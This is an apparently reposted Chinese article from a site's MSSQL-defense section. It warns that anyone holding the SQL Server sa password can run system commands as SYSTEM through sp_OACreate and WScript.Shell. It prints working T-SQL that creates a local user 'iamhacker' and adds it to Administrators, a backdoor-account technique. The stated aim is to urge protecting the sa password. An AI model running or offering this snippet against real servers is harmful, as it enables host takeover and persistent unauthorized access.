当前位置:七道奇文章资讯数据防范MSSQL防范
日期:2011-05-02 15:21:00  来源:本站整理

SQLServer的安全隐患:不要认为黑掉的只是SQLSERVER罢了.[MSSQL防范]

赞助商链接



  本文“SQLServer的安全隐患:不要认为黑掉的只是SQLSERVER罢了.[MSSQL防范]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

sql server存在着非常严重的安全隐患.sa的密码就像Administrator的密码一样重要.www.c hinaitpower.comluGuV5

假定别人得到了数据库超级用户sa的密码,那么他/她可以在查询解析器里利用下面的SQL语句简单在Win2000(SQL SERVER所在的Server)上成立一个超级用户:www.c hinaitpower.comluGuV5

declare @object int
--成立WScript.Shell
EXEC sp_OACreate 'WScript.Shell',@object OUT
--运行net user iamhacker opendoor /add
--增添一个名字为iamhacker,密码为opendoor的用户
EXEC sp_OAMethod @object,'Run',NULL,'net user iamhacker opendoor /add'
--把iamhacker增添到Administrators组中
EXEC sp_OAMethod @object,'Run',NULL,'net localgroup Administrators iamhacker /add'
--把iamhacker从User组中删除
EXEC sp_OAMethod @object,'Run',NULL,'net localgroup Users iamhacker /del'www.c hinaitpower.comluGuV5

我已经尝试过了..实在太可怕了.www.c hinaitpower.comluGuV5

上面的语句很短.核心是可以调用平台号令 net .www.c hinaitpower.comluGuV5

其实现办法是SQL SERVER调用COM Automation的强盛功效.再配合WSH中的一个对象WScript.Shell的一个办法:Run.(注意,普通SQL SERVER都是配置在SYSTEM的权限下运行的.也就是说,Run所调用的程序也是具有SYSTEM的权限.)www.c hinaitpower.comluGuV5

(相关的实行是,调用一下NOTEPAD,那么任务管理器下将有效户为SYSTEM的NOTEPAD.EXE进程存在)www.c hinaitpower.comluGuV5

WScript.Shell的隐患其实已经在各个方面很明显了.想不到目前竟然在Sql Server上也有相关的问题.www.c hinaitpower.comluGuV5

所以.大家一定要注意保管好sa的密码.不要随便被人黑了哦...www.c hinaitpower.comluGuV5

 www.c hinaitpower.comluGuV5

 www.c hinaitpower.comluGuV5

  以上是“SQLServer的安全隐患:不要认为黑掉的只是SQLSERVER罢了.[MSSQL防范]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • sqlserver索引的原理及索引成立的注意事项小结
  • sqlserver数据库主键的生成方法小结(sqlserver,mysql)
  • sqlserver主键计划的注意点
  • CREATE FUNCTION sqlserver用户定义函数
  • 利用cmd号令行窗口操作SqlServer的办法
  • sqlserver bcp(数据导入导出工具)普通用法与号令详解
  • 重命名SQLServer数据库的办法
  • 利用SqlBulkCopy时应注意Sqlserver表中利用缺省值的列
  • sqlserver中将varchar范例转换为int型再举行排序的办法
  • sqlserver 改正列名及表名的sql语句
  • SQLServer顶用T—SQL号令查询一个数据库中有哪些表的sql语句
  • sqlserver 脚本和批处理指令小结
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .